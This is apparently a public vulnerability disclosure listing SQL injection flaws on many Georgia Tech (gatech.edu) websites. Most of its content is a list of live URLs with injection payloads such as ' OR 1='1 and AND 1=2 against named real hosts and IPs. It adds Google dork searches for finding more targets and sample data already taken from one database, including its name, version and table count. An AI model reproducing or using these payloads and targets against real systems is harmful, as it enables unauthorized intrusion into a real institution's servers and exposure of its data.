`*********************************************************
Georgia Tech
Multiple SQL Injection Vulnerabilities
*********************************************************
# #
# )\._.,--....,'``. #
# .b--. /; _.. \ _\ (`._ ,. #
# `=,-,-'~~~ `----(,_..'--(,_..'`-.;.' #
# #
# Disclosure by: cats #
# Domain: gatech.edu #
# #
# [1] Description #
# [2] Extracted sample data #
# [3] Vulnerabilities and details #
# #
*********************************************************
[1] Description
A large amount of vulnerabilities have been found in just
about every site and service that gatech.edu has online.
The ones listed here in this document are just a small
amount of the real thing, and these are only SQL injections,
which seems to be their biggest issue. And with a simple
Google dork, a lot of more vulnerabilites can be found
under this domain.
Since one of their issues lies in /news/event.php, a
simple Google search of that within the domain will show
a lot of their affected sites.
http://www.google.se/#q=gatech.edu&hl=en&ei=sEe5TMW5KMyVOv
2R2YkN&start=70&sa=N&fp=e32992756bb43726
https://encrypted.google.com/search?q=allinurl:+/news/even
t.php%3Fid%3D+site:gatech.edu&hl=en&lr=&ei=2lHKTPm-IcSBlAf
bnvHtCg&start=10&sa=N
The people responsible for these services have been notified
some time ago and they have had a lot of time to fix the
issues, although it seems like they are ignoring the
warnings.
A very limited amount of sensitive information will be
disclosed in this document (apart from the vulnerabilities).
[2] Extracted sample data
IP: 130.207.160.82
URL: http://www.studentaffairs.gatech.edu/plugins/content/index.php?id=21
Database username: [email protected]
Database name: studentaffairs
Database Version : 5.1.40-community-log
Number of tables in database: 228
[3] Vulnerabilities and details
130.207.160.82
http://www.chemistry.gatech.edu/events/special/index.php?sID=1%20AND%201=2
http://www.successprograms.gatech.edu/plugins/content/index.php?id=181' OR 1='1
http://www.studentaffairs.gatech.edu/plugins/content/index.php?id=21' OR 1='1
http://webdev.gatech.edu/46/plugins/content/index.php?id=129' OR 1='1
http://www.cqgrd.gatech.edu/story.php?id=5137%20AND%201=2
http://www.crc.gatech.edu/plugins/content/index.php?id=351%27%20AND%201=%271
http://www.chemistry.gatech.edu/news/release.php?id=4570%20AND%201=1
http://www.inta.gatech.edu/news-events/news/release.php?id=5167%20AND%201=2
http://www.inta.gatech.edu/news-events/events/event.php?id=6439%20AND%201=2
http://www.cetl.gatech.edu/events/event.php?id=5830%27
http://www.profpractice.gatech.edu/news/event.php?id=4019%20AND%201=1
http://www.hts.gatech.edu/news/event.php?id=3679%20AND%201=1
http://www.cope.gatech.edu/news/event.php?id=5900%20AND%201=1
http://www.ptfe.gatech.edu/news/event.php?id=5367%20AND%201=1
http://www.honor.gatech.edu/plugins/content/index.php?id=9%27%20AND%201=%271
http://www.career.gatech.edu/plugins/content/index.php?id=241%27%20AND%201=%271
http://www.gradcoop.gatech.edu/news/event.php?id=5112%20AND%201=2
http://www.coop.gatech.edu/news/event.php?id=5208%20AND%201=2
http://www.op.gatech.edu/news/story.php?id=1256%20AND%201=1
128.61.179.103
http://tempest.arch.gatech.edu/news/story.php?id=1233%20AND%201=1
https://escol.coa.gatech.edu/news/story.php?id=1187%20AND%201=2
130.207.91.98
http://www.ptfe.gatech.edu/news/event.php?id=5803%20AND%201=2
130.207.66.87
http://www.biology.gatech.edu/news/story.php?id=5201%20AND%201=1
http://www.test.biology.gatech.edu/news/story.php?id=3096%20AND%201=1
128.61.135.12
http://www.bme.gatech.edu/calendar/calendar_files/event_info.php?event_id=457%20AND%201=1
130.207.243.18
http://www.housing.gatech.edu/features/FeatureDisplay.cfm?FEATNO=159%20AND%201=2
130.207.244.120
http://www.gatech.edu/departments/index.html?id=1186%20AND%201=1%20--
http://www.gatech.edu/contact/index.html?id=n5183%20AND%201=1
http://www.gatech.edu/news-room/contact-person-news.php?id=1896&n=5183 AND 1=2
Other (Mostly new ones, not checked for blind or visible SQLi)
http://www.test.biology.gatech.edu/news/story.php?id=3096%20AND%201=1
http://www.op.gatech.edu/news/story.php?id=1256%20AND%201=1
http://tempest.arch.gatech.edu/news/story.php?id=1233%20AND%201=1
https://escol.coa.gatech.edu/news/story.php?id=1187%20AND%201=2
http://www2.me.gatech.edu/www/theses/summary.asp?db=1&LASTNAME=Abbasi&FIRSTNAME=Zubair'
http://dcom.arch.gatech.edu/pcibim/memberscomment.asp?docid=30
http://bim.arch.gatech.edu/app/bimtools/tool.asp?id=431&app_id=15
http://bim.arch.gatech.edu/content_view.asp?id=550%20AND%201=1
(Needs POST data, use the search field)
http://www2.me.gatech.edu/www/theses/Search.asp
#End of file
`